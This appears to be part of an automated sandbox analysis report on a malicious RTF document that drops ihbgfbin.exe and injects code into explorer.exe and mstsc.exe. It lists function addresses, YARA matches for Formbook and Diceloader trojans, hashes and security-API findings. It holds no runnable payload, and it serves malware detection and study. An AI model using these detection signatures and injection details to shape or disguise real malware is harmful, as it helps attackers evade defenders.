      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D8C5F07_2_00D8C5F0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DF05E37_2_00DF05E3
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DB65407_2_00DB6540
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D7E6C17_2_00D7E6C1
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D746807_2_00D74680
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E126227_2_00E12622
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DBA6347_2_00DBA634
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D7C7BC7_2_00D7C7BC
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D7C85C7_2_00D7C85C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D9286D7_2_00D9286D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E049F57_2_00E049F5
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D869FE7_2_00D869FE
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D729B27_2_00D729B2
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E1098E7_2_00E1098E
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DBC9207_2_00DBC920
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DF6BCB7_2_00DF6BCB
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E1CBA47_2_00E1CBA4
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E12C9C7_2_00E12C9C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DFAC5E7_2_00DFAC5E
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D7CD5B7_2_00D7CD5B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DA0D3B7_2_00DA0D3B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D8EE4C7_2_00D8EE4C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DA2E2F7_2_00DA2E2F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DE2FDC7_2_00DE2FDC
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E0CFB17_2_00E0CFB1
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D80F3F7_2_00D80F3F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D8905A7_2_00D8905A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D730407_2_00D73040
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DED06D7_2_00DED06D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D9D0057_2_00D9D005
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DFD13F7_2_00DFD13F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E112387_2_00E11238
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D6F3CF7_2_00D6F3CF
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D773537_2_00D77353
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D814897_2_00D81489
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DA54857_2_00DA5485
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DAD47D7_2_00DAD47D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E135DA7_2_00E135DA
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D7351F7_2_00D7351F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DA57C37_2_00DA57C3
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DF579A7_2_00DF579A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E0771D7_2_00E0771D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E0F8EE7_2_00E0F8EE
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DEF8C47_2_00DEF8C4
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DF59557_2_00DF5955
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DF394B7_2_00DF394B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E23A837_2_00E23A83
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D6FBD77_2_00D6FBD7
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DFDBDA7_2_00DFDBDA
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D97B007_2_00D97B00
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E0FDDD7_2_00E0FDDD
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D9DF7C7_2_00D9DF7C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DFBF147_2_00DFBF14
      Source: C:\Windows\explorer.exeCode function: 9_2_082000369_2_08200036
      Source: C:\Windows\explorer.exeCode function: 9_2_081F70829_2_081F7082
      Source: C:\Windows\explorer.exeCode function: 9_2_081FE9129_2_081FE912
      Source: C:\Windows\explorer.exeCode function: 9_2_081F8D029_2_081F8D02
      Source: C:\Windows\explorer.exeCode function: 9_2_082045CD9_2_082045CD
      Source: C:\Windows\explorer.exeCode function: 9_2_082012329_2_08201232
      Source: C:\Windows\explorer.exeCode function: 9_2_081FBB329_2_081FBB32
      Source: C:\Windows\explorer.exeCode function: 9_2_081FBB309_2_081FBB30
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDD2329_2_08CDD232
      Source: C:\Windows\explorer.exeCode function: 9_2_08CD30829_2_08CD3082
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDC0369_2_08CDC036
      Source: C:\Windows\explorer.exeCode function: 9_2_08CE05CD9_2_08CE05CD
      Source: C:\Windows\explorer.exeCode function: 9_2_08CD4D029_2_08CD4D02
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDA9129_2_08CDA912
      Source: C:\Windows\explorer.exeCode function: 9_2_08CD7B309_2_08CD7B30
      Source: C:\Windows\explorer.exeCode function: 9_2_08CD7B329_2_08CD7B32
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0094884E10_2_0094884E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0091C86910_2_0091C869
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0096490810_2_00964908
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0091215210_2_00912152
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0093DA8510_2_0093DA85
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0093E2AE10_2_0093E2AE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0095950610_2_00959506
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0093874110_2_00938741
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022AE2E910_2_022AE2E9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022B230510_2_022B2305
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022FA37B10_2_022FA37B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_023563BF10_2_023563BF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022D63DB10_2_022D63DB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022AE0C610_2_022AE0C6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0235262210_2_02352622
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022FA63410_2_022FA634
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022B468010_2_022B4680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022BE6C110_2_022BE6C1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022BC7BC10_2_022BC7BC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233443E10_2_0233443E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022F654010_2_022F6540
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_023305E310_2_023305E3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022CC5F010_2_022CC5F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0235CBA410_2_0235CBA4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02336BCB10_2_02336BCB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022D286D10_2_022D286D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022BC85C10_2_022BC85C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022FC92010_2_022FC920
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022B29B210_2_022B29B2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0235098E10_2_0235098E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_023449F510_2_023449F5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022C69FE10_2_022C69FE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022E2E2F10_2_022E2E2F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022CEE4C10_2_022CEE4C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022C0F3F10_2_022C0F3F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0234CFB110_2_0234CFB1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02322FDC10_2_02322FDC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233AC5E10_2_0233AC5E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02352C9C10_2_02352C9C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022E0D3B10_2_022E0D3B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022BCD5B10_2_022BCD5B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0235123810_2_02351238
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022B735310_2_022B7353
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022AF3CF10_2_022AF3CF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022DD00510_2_022DD005
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0232D06D10_2_0232D06D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022B304010_2_022B3040
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022C905A10_2_022C905A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233D13F10_2_0233D13F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0234771D10_2_0234771D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233579A10_2_0233579A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022E57C310_2_022E57C3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022ED47D10_2_022ED47D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022C148910_2_022C1489
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022E548510_2_022E5485
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022B351F10_2_022B351F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_023535DA10_2_023535DA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02363A8310_2_02363A83
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022D7B0010_2_022D7B00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233DBDA10_2_0233DBDA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022AFBD710_2_022AFBD7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0234F8EE10_2_0234F8EE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0232F8C410_2_0232F8C4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233595510_2_02335955
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233394B10_2_0233394B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0233BF1410_2_0233BF14
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022DDF7C10_2_022DDF7C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0234FDDD10_2_0234FDDD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009D64C10_2_0009D64C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00082D9010_2_00082D90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00089E5D10_2_00089E5D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00089E6010_2_00089E60
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00082FB010_2_00082FB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204A03610_2_0204A036
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204B23210_2_0204B232
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02045B3010_2_02045B30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02045B3210_2_02045B32
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204108210_2_02041082
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204891210_2_02048912
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02042D0210_2_02042D02
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204E5CD10_2_0204E5CD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 022ADF5C appears 137 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00911040 appears 587 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 022AE2A8 appears 60 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00964E47 appears 128 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 022F373B appears 253 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0231F970 appears 84 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 022F3F92 appears 132 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: String function: 00DDF970 appears 84 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: String function: 00D6E2A8 appears 60 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: String function: 00DB3F92 appears 132 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: String function: 00DB373B appears 253 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: String function: 00D6DF5C appears 137 times
      Source: na.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: 7.2.ihbgfbin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
      Source: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: ihbgfbin.exe PID: 3736, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: ihbgfbin.exe PID: 3824, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: mstsc.exe PID: 3948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 4q0pGnqqpgTTSL7[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: ihbgfbin.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: _0020.SetAccessControl
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: _0020.AddAccessRule
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: _0020.SetAccessControl
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: _0020.AddAccessRule
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: _0020.SetAccessControl
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
